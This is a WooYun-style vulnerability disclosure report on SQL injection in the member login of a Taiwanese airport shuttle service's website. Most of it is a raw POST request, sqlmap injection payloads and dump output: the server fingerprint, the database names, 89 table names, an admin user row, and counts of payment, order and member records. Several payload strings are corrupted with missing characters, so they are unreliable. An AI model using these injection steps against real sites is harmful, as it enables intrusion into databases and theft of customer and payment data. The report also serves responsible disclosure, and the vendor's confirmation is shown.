乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-16: 细节已通知厂商并且等待厂商处理中 2015-12-18: 厂商已经确认,细节仅向厂商公开 2015-12-28: 细节向核心白帽子及相关领域专家公开 2016-01-07: 细节向普通白帽子公开 2016-01-17: 细节向实习白帽子公开 2016-02-01: 细节向公众公开
南屏旅遊車隊,提供最舒適極尊榮的機場旅客來回接送。特別訂定『人在家中坐,服務到家中來』的服務至上宗旨,提供商務洽辦、考察或旅遊等專車服務。為國內外商務、旅遊及觀光之民眾給予一個安全、便利、舒適之旅。強調代客上下行李服務,使客戶備感溫馨及尊貴。不斷開擴新市場及發展與交通、運輸有關的業務,更可為您量身訂製各種商務、旅遊之專車服務。南屏優良品牌,永續經營理念,堅持顧客第一、服務至上。車型有轎車、休旅車、商務車、賓士車等多種車型,提供價廉物美之高檔享受,為國旅市場掀起翻雲覆雨旋風!南屏車隊採用歐洲進口原裝VW--T5、超大行李箱適合長程線及高爾夫球團使用。為求您旅程安全可靠,更為每位乘客投保500萬的旅客平安險。
主站:http://**.**.**.**
会员登入处存在注入:post
POST /web/query_login HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://**.**.**.**/Content-Length: 160Cookie: PHPSESSID=bh4g1btdu5b9qcahv3beu7dov0Connection: keep-alivePragma: no-cacheCache-Control: no-cachepwd=c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec&account=admin&pwd_org=admin
数据:
Place: POSTParameter: pwd Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: pwd=c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931d472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec' AND (SELECT637 FROM(SELECT COUNT(*),CONCAT(0x3a69626e3a,(SELECT (CASE WHEN (7637=7637) THE 1 ELSE 0 END)),0x3a75666e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTR_SETS GROUP BY x)a) AND 'DrmE'='DrmE&account=admin&pwd_org=admin Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: pwd=c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931d472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec'; SELECT SLEE(5);# AND 'WcYk'='WcYk&account=admin&pwd_org=adminPlace: POSTParameter: account Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: pwd=c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931d472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec&account=admin AND (SELECT 5095 FROM(SELECT COUNT(*),CONCAT(0x3a69626e3a,(SELECT (CASE WHEN (095=5095) THEN 1 ELSE 0 END)),0x3a75666e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_CHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eWMV'='eWMV&pwd_org=admin---there were multiple injection points, please select the one to use for followin injections:[0] place: POST, parameter: pwd, type: Single quoted string (default)[1] place: POST, parameter: account, type: Single quoted string[q] Quit>[11:56:10] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Red Hat Enterprise 5 (Tikanga)web application technology: Apache 2.2.3, PHP 5.2.17back-end DBMS: MySQL 5.0[11:56:10] [INFO] fetching current user[11:56:10] [INFO] retrieved: nanping@%current user: 'nanping@%'
涉及3裤
available databases [3]:[*] hunter75322_nanping[*] information_schema[*] test
Database: test[89 tables]+-------------------------+| credit_payment || zcs_account_log || zcs_ad || zcs_ad_custom || zcs_ad_position || zcs_admin_action || zcs_admin_log || zcs_admin_message || zcs_admin_user || zcs_adsense || zcs_affiliate_log || zcs_agency || zcs_area_region || zcs_article || zcs_article_cat || zcs_attribute || zcs_auction_log || zcs_auto_manage || zcs_back_goods || zcs_back_order || zcs_bonus_type || zcs_booking_goods || zcs_brand || zcs_card || zcs_cart || zcs_cat_recommend || zcs_category || zcs_collect_goods || zcs_comment || zcs_crons || zcs_delivery_goods || zcs_delivery_order || zcs_email_list || zcs_email_sendlist || zcs_error_log || zcs_exchange_goods || zcs_favourable_activity || zcs_feedback || zcs_friend_link || zcs_goods || zcs_goods_activity || zcs_goods_article || zcs_goods_attr || zcs_goods_cat || zcs_goods_gallery || zcs_goods_type || zcs_group_goods || zcs_keywords || zcs_link_goods || zcs_mail_templates || zcs_member_price || zcs_nav || zcs_order_action || zcs_order_goods || zcs_order_info || zcs_pack || zcs_package_goods || zcs_pay_log || zcs_payment || zcs_plugins || zcs_products || zcs_reg_extend_info || zcs_reg_fields || zcs_region || zcs_role || zcs_searchengine || zcs_sessions || zcs_sessions_data || zcs_shipping || zcs_shipping_area || zcs_shop_config || zcs_snatch_log || zcs_stats || zcs_suppliers || zcs_tag || zcs_template || zcs_topic || zcs_user_account || zcs_user_address || zcs_user_bonus || zcs_user_feed || zcs_user_rank || zcs_users || zcs_virtual_card || zcs_volume_price || zcs_vote || zcs_vote_log || zcs_vote_option || zcs_wholesale |+-------------------------+
管理员:
Table: zcs_admin_user[1 entry]+-------------+----------+-----------+---------------------------+-----------+---------+------------+----------+----------+---------+--------------+----------+---------+-----------+| action_list | add_time | agency_id | email | lang_type | last_ip | last_login | nav_list | password | role_id | suppliers_id | todolist |user_id | user_name |+-------------+----------+-----------+---------------------------+-----------+---------+------------+----------+----------+---------+--------------+----------+---------+-----------+| all | | | moonlightff10@**.**.**.** | <blank> | | | | | | | | | 072691148 |+-------------+----------+-----------+---------------------------+-----------+--
20份支付日志
<code>Database: test+-------------+---------+| Table | Entries |+-------------+---------+| zcs_pay_log | 20 |+-------------+---------+
</code>机票订单
Database: hunter75322_nanping+-----------+---------+| Table | Entries |+-----------+---------+| car_order | 11 |+-----------+---------+
Database: hunter75322_nanping+--------+---------+| Table | Entries |+--------+---------+| member | 82602 |+--------+---------+
涉及重要表段:
zcs_order_infozcs_user_accountzcs_email_listzcs_card zcs_pay_log zcs_admin_user
但是跑了大半天,没看见大数据啊 啥情况
危害等级:高
漏洞Rank:17
确认时间:2015-12-18 19:25
感謝通報
暂无